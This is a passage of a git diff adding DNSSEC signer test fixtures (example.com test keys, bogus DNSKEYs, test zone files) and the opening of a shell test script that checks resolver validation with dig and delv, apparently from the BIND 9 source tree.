oPgOOyAT8LIMsM8x4f+EbU6m9Zc3Esafek9iLCS9R1333Pm1EEh5ghQT BsZ7omc5aSvrKUaIneojU3RdofceZouCliIDXmqscfY0y6bivGcmCQI/ LM4XUh7GWlM= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private new file mode 100644 index 0000000..6d7f72e --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.private @@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 10 (RSASHA512) +Modulus: ziW3x8Ox0LMwIsfFebw6T93DpcOKrHTpF/jstN4uajpvrjGbUWzTOWg0ytxkODBLkjGNDcGt6pzloRz6N6G56oJdr98lcx0i3VWlQbQfsY/gH7UhWYSLOId+Y6jOS12S4DIupyw2Gx/4nX5sKgclJ9+DPopuMGSz+NHXa7JSdkIOsoYT8p+JHSClPfBq2oaqoKE7QperY3Y+ydh/JEN5rkUxSMyg+A47IBPwsgywzzHh/4RtTqb1lzcSxp96T2IsJL1HXffc+bUQSHmCFBMGxnuiZzlpK+spRoid6iNTdF2h9x5mi4KWIgNeaqxx9jTLpuK8ZyYJAj8szhdSHsZaUw== +PublicExponent: AQAB +PrivateExponent: Wr3fl99cdjFqDuVA18UzJdTIOj9I24Da2eKIz1S9uaTfZB4R8FWm5K4qDuHUe6dGnKOTI2sN0ygdLD5FJhfabo/UDYZ8RZ+dqS/5/mH7UX2zekGQ3Iargcaiq9uycxpNfMKaJpwfdPEtzqXHlvhuMo8AhpcIyeSKFAzKdm2YPtUqIrum4RARHyfRLfLyWlkIotPdyiaKCVGQxiRbFsTcmIB2Bizmt7zRjlB+Hxf8MooXmaKUFRQtMCLnFGK0ecFI1CWAxmLSanvYVKQ0HxcFkFKzRiZAz1au7ZfMgYDZj0jF72WAGU3Edcmdc0QIQRTWjb/3wcBfwlr9s6lKoF3ngQ== +Prime1: 1EIziKhz7dF41rb/hckdr2qeY8eM7tLrT5jIMPLISHCCuKm5IK2u7PY6m6NjMdhx1ilm7K2RGTt+TTFZaqDIEd8qpzRCxAGcfTVOmB9iHwmi9i9RoPSlY6o+iShft68ZnvPiGJWUF2huRYVK2F0cIWErwSqaBGsFd79mXmlkn98= +Prime2: +KEdNtZj9JyCCR2xbLAw3tnAYxHvJ3skVMjxV3cyUupMWi12NWxGhHH1nnetXxDR2LBBuqIl4pE/4MeXe3sClMHTL3Z9XG+pzQAsHS7yvsfZERdyuWZYYy0ya/7XY2auvRVO6LxN7d47VWjYxAGfoCsbCEivgDxmt1dTZhAtRA0= +Exponent1: d5TcZ69PsLoEtCLhDkRh/wO4PEqeMaaOf4d5sWn2QCly3Apyi+CN3l5SYoDIT7q7V4Z3v/uA9ZA49dBJqfLvBHKQGycsPjUSLtAreTSlGQtazguWl3F9BAtTs/4U/u0dKBoKVQNgLVfeWDhiFEdQo9WUyvzvTHHm4LHqQGJsGE0= +Exponent2: EU2dK+DVygNOZXYEkAzfCdNbuUlZPIUsbR4i9bRc8zpNIAWD8YncioEn1+R6U2BnSk5R9LwuKMt1B568YyKXdmTa3rW/WbyHs7WsXEeVK0PbTn40RMTjp9tQZAWzVb6isJQYDsh0H/bUaEhItbNrOYlmczgjxqftehsAudysWc0= +Coefficient: sl2u/8vttxpiTbspGV4SsaDmKUNdzQH7BgJ5rl3mXPp/aUpLw0Sr7FuARy8W8tq3yVNi9qCOnvGwVl6aQzZP7b8N04KiH8gewlAVdSfxG24yFKJIQNbWGKFZYZFYyjtLVlpK6NYF0f0I1KpAjn58XR0qIBvRFZYWBAkggU9C7ro= +Created: 20211221062130 +Publish: 20211221062130 +Activate: 20211221062130 diff --git a/bin/tests/system/dnssec/signer/general/bogus-ksk.key b/bin/tests/system/dnssec/signer/general/bogus-ksk.key new file mode 100644 index 0000000..e468574 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/bogus-ksk.key @@ -0,0 +1,6 @@ +; +; This is a bogus key. It will not have a .private file. +; +; This will be key id 23221 +; +example.com. IN DNSKEY 257 3 10 AwEAAbcyptpM++pVjhpYQW2fVtyOw04IBSw4X0SYi/Ke4wVkmDNW2vBm AFkgiVVKmmNbb0IHDYQiIY7seXk0fjEwjzeY2bmeOAZxDdv2KT9VQpoY Matk2y4NTi6F/V04x0lL/CBvyifTeNbZKvY+S1eKFuWHeS5Ss8tiagz9 zdYWUe/msvmin+Hbs2tlLwXVl4hOmABCL9uK9H8R6GPL5VdEXYyFOh/v 71CNhRU5ufrARti69YYkfzH6NpWhlJWyJvDjqAdt2L3H8V71C2vcXbBu S5NscEYl+8JQfwUvOTN553I5IQrG+NQEusW36UM/Rkad8mMnUVM9Vzqk GH86GHKtLMc= diff --git a/bin/tests/system/dnssec/signer/general/bogus-zsk.key b/bin/tests/system/dnssec/signer/general/bogus-zsk.key new file mode 100644 index 0000000..aa45938 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/bogus-zsk.key @@ -0,0 +1,6 @@ +; +; This is a bogus key. It will not have a .private file. +; +; This will be key id 48930 +; +example.com. IN DNSKEY 256 3 10 AwEAAa/0IcnbGutPVkrz04tw5ZIYx6rU+FprB2rlKS8cTK/wiBOqbOC6 QIDdegDpZG1fOdj04ZQGa3pIizqC2CnlIWfxpfR6W+qSLRBuQ8gmwTmS c/Jy/0vAGB3fv3oVIqKslLNqIXZb3CKNiA2kGcut3aUgfeOW970Jga6z PAGKqPpPZTelW1Qy9N5BO4cRTuYo4uvbZveJv1W/2n5RN+UaeqU0f+AE DP0+wqSWNUfZsi6HygLwk08x3eO8PzTBlqBlAMfvNAygrmXqccMREyyH KEc5dVJ1qOXfj8BAdJUPmunyJhIwC9PxzOW7mn1lW7mZO2D5U/Jaxw2k eX2KblmVk8s= diff --git a/bin/tests/system/dnssec/signer/general/test1.zone b/bin/tests/system/dnssec/signer/general/test1.zone new file mode 100644 index 0000000..98c9f02 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test1.zone @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has two DNSKEY records, both of which have +; existing private key files available. They should be loaded automatically +; and the zone correctly signed. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+18240.key +$include Kexample.com.+010+28633.key diff --git a/bin/tests/system/dnssec/signer/general/test2.zone b/bin/tests/system/dnssec/signer/general/test2.zone new file mode 100644 index 0000000..97c0d3d --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test2.zone @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has one non-KSK DNSKEY record for which the +; private key file exists. It should be loaded automatically and the zone +; correctly signed. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+18240.key diff --git a/bin/tests/system/dnssec/signer/general/test3.zone b/bin/tests/system/dnssec/signer/general/test3.zone new file mode 100644 index 0000000..bf9bc66 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test3.zone @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has one KSK DNSKEY record for which the +; private key file exists. It should be loaded automatically. As there +; is no non-KSK DNSKEY the resulting zone should be rejected. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+28633.key diff --git a/bin/tests/system/dnssec/signer/general/test4.zone b/bin/tests/system/dnssec/signer/general/test4.zone new file mode 100644 index 0000000..9f05de5 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test4.zone @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has three DNSKEY records, two (KSK + ZSK) of +; which have existing private key files available. The third is a +; pre-published ZSK. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+18240.key +$include Kexample.com.+010+28633.key +$include bogus-zsk.key diff --git a/bin/tests/system/dnssec/signer/general/test5.zone b/bin/tests/system/dnssec/signer/general/test5.zone new file mode 100644 index 0000000..d61504f --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test5.zone @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has three DNSKEY records, two (KSK +ZSK) of which +; have existing private key files available. The third is a KSK. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+18240.key +$include Kexample.com.+010+28633.key +$include bogus-ksk.key diff --git a/bin/tests/system/dnssec/signer/general/test6.zone b/bin/tests/system/dnssec/signer/general/test6.zone new file mode 100644 index 0000000..fcfb1ec --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test6.zone @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has four DNSKEY records, two (KK + ZSK) of which +; have existing private key files available. There are also a KSK and ZSK +; for which there will be no signatures. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+18240.key +$include Kexample.com.+010+28633.key +$include bogus-ksk.key +$include bogus-zsk.key diff --git a/bin/tests/system/dnssec/signer/general/test7.zone b/bin/tests/system/dnssec/signer/general/test7.zone new file mode 100644 index 0000000..e52c535 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test7.zone @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has two DNSKEY records, none of which have +; existing private key files available. The resulting zone should fail +; the consistency tests. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include bogus-ksk.key +$include bogus-zsk.key diff --git a/bin/tests/system/dnssec/signer/general/test8.zone b/bin/tests/system/dnssec/signer/general/test8.zone new file mode 100644 index 0000000..893d32d --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test8.zone @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has two DNSKEY records, one of which, +; the KSK, has a private key. The resulting zone should be rejected as +; it has no ZSK signatures. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+010+28633.key +$include bogus-zsk.key diff --git a/bin/tests/system/dnssec/signer/general/test9.zone b/bin/tests/system/dnssec/signer/general/test9.zone new file mode 100644 index 0000000..14c47d0 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/test9.zone @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This is a zone which has two DNSKEY records, both of which have +; existing private key files available. They should be loaded automatically +; and the zone correctly signed. +; +$TTL 3600 +example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300 +$include Kexample.com.+008+63613.key +$include Kexample.com.+008+15002.key diff --git a/bin/tests/system/dnssec/signer/prepub.db.in b/bin/tests/system/dnssec/signer/prepub.db.in new file mode 100644 index 0000000..946aac1 --- /dev/null +++ b/bin/tests/system/dnssec/signer/prepub.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +prepub. 60 IN SOA prepub. . 0 0 0 0 0 +prepub. 60 IN NS prepub. +prepub. 60 IN A 1.2.3.4 +; out of zone record +out-of-zone. 60 IN A 1.2.3.4 diff --git a/bin/tests/system/dnssec/signer/remove.db.in b/bin/tests/system/dnssec/signer/remove.db.in new file mode 100644 index 0000000..5629a42 --- /dev/null +++ b/bin/tests/system/dnssec/signer/remove.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +remove. 60 IN SOA remove. . 0 0 0 0 0 +remove. 60 IN NS remove. +remove. 60 IN A 1.2.3.4 +remove. 60 IN AAAA ::ffff:1.2.3.4 +remove. 60 IN MX 0 remove. +$INCLUDE remove.db.signed diff --git a/bin/tests/system/dnssec/signer/remove2.db.in b/bin/tests/system/dnssec/signer/remove2.db.in new file mode 100644 index 0000000..b2962b9 --- /dev/null +++ b/bin/tests/system/dnssec/signer/remove2.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +remove. 60 IN SOA remove. . 0 0 0 0 0 +remove. 60 IN NS remove. +remove. 60 IN A 1.2.3.4 +$INCLUDE remove.db.signed diff --git a/bin/tests/system/dnssec/tests.sh b/bin/tests/system/dnssec/tests.sh new file mode 100644 index 0000000..64927f3 --- /dev/null +++ b/bin/tests/system/dnssec/tests.sh @@ -0,0 +1,4441 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=1 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +dig_with_additionalopts() { + "$DIG" +noall +additional +dnssec -p "$PORT" "$@" +} + +dig_with_answeropts() { + "$DIG" +noall +answer +dnssec -p "$PORT" "$@" +} + +delv_with_opts() { + "$DELV" -a ns1/trusted.conf -p "$PORT" "$@" +} + +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +# TODO: Move loadkeys_on to conf.sh.common +dnssec_loadkeys_on() { + nsidx=$1 + zone=$2 + nextpart ns${nsidx}/named.run > /dev/null + rndccmd 10.53.0.${nsidx} loadkeys ${zone} | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "next key event" ns${nsidx}/named.run || return 1 +} + +# convert private-type records to readable form +showprivate () { + echo "-- $* --" + dig_with_opts +nodnssec +short "@$2" -t type65534 "$1" | cut -f3 -d' ' | + while read -r record; do + # shellcheck disable=SC2016 + $PERL -e 'my $rdata = pack("H*", @ARGV[0]); + die "invalid record" unless length($rdata) == 5; + my ($alg, $key, $remove, $complete) = unpack("CnCC", $rdata); + my $action = "signing"; + $action = "removing" if $remove; + my $state = " (incomplete)"; + $state = " (complete)" if $complete; + print ("$action: alg: $alg, key: $key$state\n");' "$record" + done +} + +# check that signing records are marked as complete +checkprivate () { + for i in 1 2 3 4 5 6 7 8 9 10; do + showprivate "$@" | grep -q incomplete || return 0 + sleep 1 + done + echo_d "$1 signing incomplete" + return 1 +} + +# check that a zone file is raw format, version 0 +israw0 () { + # shellcheck disable=SC2016 + < "$1" $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version != 0);' + return $? +} + +# check that a zone file is raw format, version 1 +israw1 () { + # shellcheck disable=SC2016 + < "$1" $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version != 1);' + return $? +} + +# strip NS and RRSIG NS from input +stripns () { + awk '($4 == "NS") || ($4 == "RRSIG" && $5 == "NS") { next} { print }' "$1" +} + +# +# Ensure there is not multiple consecutive blank lines. +# Ensure there is a blank line before "Start view" and +# "Negative trust anchors:". +# Ensure there is not a blank line before "Secure roots:". +# +check_secroots_layout () { + tr -d '\r' < "$1" | \ + awk '$0 == "" { if (empty) exit(1); empty=1; next } + /Start view/ { if (!empty) exit(1) } + /Secure roots:/ { if (empty) exit(1) } + /Negative trust anchors:/ { if (!empty) exit(1) } + { empty=0 }' + return $? +} + +# Check that for a query against a validating resolver where the +# authoritative zone is unsigned (insecure delegation), glue is returned +# in the additional section +echo_i "checking that additional glue is returned for unsigned delegation ($n)" +ret=0 +$DIG +tcp +dnssec -p "$PORT" a.insecure.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ns\\.insecure\\.example\\..*A.10\\.53\\.0\\.3" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Check the example. domain + +echo_i "checking that zone transfer worked ($n)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + dig_with_opts a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 + dig_with_opts a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns2.test$n dig.out.ns3.test$n > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +digcomp dig.out.ns2.test$n dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# test AD bit: +# - dig +adflag asks for authentication (ad in response) +echo_i "checking AD bit asking for validation ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth +noadd +nodnssec +adflag a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# test AD bit: +# - dig +noadflag +echo_i "checking that AD is not set without +adflag or +dnssec ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +noadflag a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth +noadd +nodnssec +noadflag a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking for AD in authoritative answer ($n)" +ret=0 +dig_with_opts a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation NSEC ($n)" +ret=0 +dig_with_opts +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that 'example/DS' from the referral was used in previous validation ($n)" +ret=0 +grep "query 'example/DS/IN' approved" ns1/named.run > /dev/null && ret=1 +grep "fetch: example/DS" ns4/named.run > /dev/null && ret=1 +grep "validating example/DS: starting" ns4/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.example > delv.out$n || ret=1 + grep "a.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.example..*.RRSIG.A [0-9][0-9]* 2 300 .*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + ret=0 + echo_i "checking positive validation NSEC using dns_client (trusted-keys) ($n)" + "$DELV" -a ns1/trusted.keys -p "$PORT" @10.53.0.4 a a.example > delv.out$n || ret=1 + grep "a.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.example..*.RRSIG.A [0-9][0-9]* 2 300 .*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive validation NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.nsec3.example > delv.out$n || ret=1 + grep "a.nsec3.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.nsec3.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive validation OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +SP="[[:space:]]+" + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.optout.example > delv.out$n || ret=1 + grep -Eq "^a\\.optout\\.example\\.""$SP""[0-9]+""$SP""IN""$SP""A""$SP""10.0.0.1" delv.out$n || ret=1 + grep -Eq "^a\\.optout\\.example\\.""$SP""[0-9]+""$SP""IN""$SP""RRSIG""$SP""A""$SP""$DEFAULT_ALGORITHM_NUMBER""$SP""3""$SP""300" delv.out$n || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard validation NSEC ($n)" +ret=0 +dig_with_opts a.wild.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep "\\*\\.wild\\.example\\..*RRSIG NSEC" dig.out.ns4.test$n > /dev/null || ret=1 +grep "\\*\\.wild\\.example\\..*NSEC z\\.example" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.example > delv.out$n || ret=1 + grep "a.wild.example..*10.0.0.27" delv.out$n > /dev/null || ret=1 + grep -E "a.wild.example..*RRSIG.A [0-9]+ 2 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard answer NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "AUTHORITY: 4," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive wildcard answer NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 4," dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive wildcard validation NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.nsec3.example > delv.out$n || ret=1 + grep -E "a.wild.nsec3.example..*10.0.0.6" delv.out$n > /dev/null || ret=1 + grep -E "a.wild.nsec3.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard validation OPTOUT ($n)" +ret=0 +dig_with_opts a.wild.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep 